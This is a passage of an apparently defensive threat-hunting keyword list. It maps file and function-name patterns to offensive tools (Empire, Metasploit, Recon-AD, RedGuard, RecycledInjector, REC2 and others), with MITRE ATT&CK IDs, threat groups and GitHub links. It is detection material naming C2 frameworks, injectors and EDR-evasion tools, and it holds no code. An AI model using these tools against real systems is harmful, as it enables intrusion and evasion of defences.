written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*rec2mastodon.rs*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*rec2virustotal*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*rec2virustotal.rs*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command 
and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*Receive-AgentJob*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*reciclador.cpp*,offensive_tool_keyword,mssqlproxy,mssqlproxy is a toolkit aimed to perform lateral movement in restricted 
environments through a compromised Microsoft SQL Server via socket reuse,T1021.002 - T1071.001 - T1573.002,TA0008 - TA0011,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/blackarrowsec/mssqlproxy,1,1,N/A,10,7,682,113,2021-02-16T20:13:04Z,2020-02-12T08:44:28Z -*reciclador.dll*,offensive_tool_keyword,mssqlproxy,mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse,T1021.002 - T1071.001 - T1573.002,TA0008 - TA0011,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/blackarrowsec/mssqlproxy,1,1,N/A,10,7,682,113,2021-02-16T20:13:04Z,2020-02-12T08:44:28Z -*reciclador.vcxproj*,offensive_tool_keyword,mssqlproxy,mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse,T1021.002 - T1071.001 - T1573.002,TA0008 - TA0011,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/blackarrowsec/mssqlproxy,1,1,N/A,10,7,682,113,2021-02-16T20:13:04Z,2020-02-12T08:44:28Z -*recon_passive.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Recon-AD-*.dll*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-*.sln*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-*.vcxproj*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-AllLocalGroups*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-Domain*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-LocalGroups*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-SPNs*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-Users.*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*recon-archy analyse*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*recon-archy build*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*recon-archy crawl*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*recon-archy-master*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*ReconUserGroupRoles.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*RecycledInjector.exe*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*RecycledInjector-main*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*RecycledInjector-main*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*RED_HAWK*,offensive_tool_keyword,red_hawk,Vulnerability Scanning and Crawling. A must have tool for all penetration testers.,T1190 - T1059 - T1595,TA0001 - TA0009,N/A,N/A,Information Gathering,https://github.com/Tuhinshubhra/RED_HAWK,1,0,N/A,N/A,10,2611,837,2022-05-31T12:08:19Z,2017-06-11T05:02:35Z -*Red-Baron*,offensive_tool_keyword,Red-Baron,Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient. disposable. 
secure and agile infrastructure for Red Teams.,T1583 - T1078 - T1027 - T1135,TA0002 - TA0003 - TA0040,N/A,N/A,Frameworks,https://github.com/byt3bl33d3r/Red-Baron,1,0,N/A,N/A,4,362,72,2020-03-05T07:19:43Z,2018-08-23T18:25:07Z -*redelk_backend_name_c2*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*redelk_backend_name_decoy*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z
-*RedGuard.log*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 
- APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z
-*RedGuard/core*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,0,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z
-*RedGuard_x64.exe*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z
-*RedGuard_x86.exe*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z 
-*redhuntlabs*,offensive_tool_keyword,redhuntlabs,documentation for offensive operation,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/redhuntlabs,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*redhuntlabs/BucketLoot*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z
-*RedHunt-OS*,offensive_tool_keyword,RedHunt-OS,Virtual Machine for Adversary Emulation and Threat Hunting by RedHunt Labs RedHunt OS aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attackers arsenal as well as defenders toolkit to actively identify the threats in your environment,T1583 - T1057 - T1016,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/redhuntlabs/RedHunt-OS,1,1,N/A,N/A,10,1170,185,2020-07-13T04:54:49Z,2018-03-14T19:31:16Z
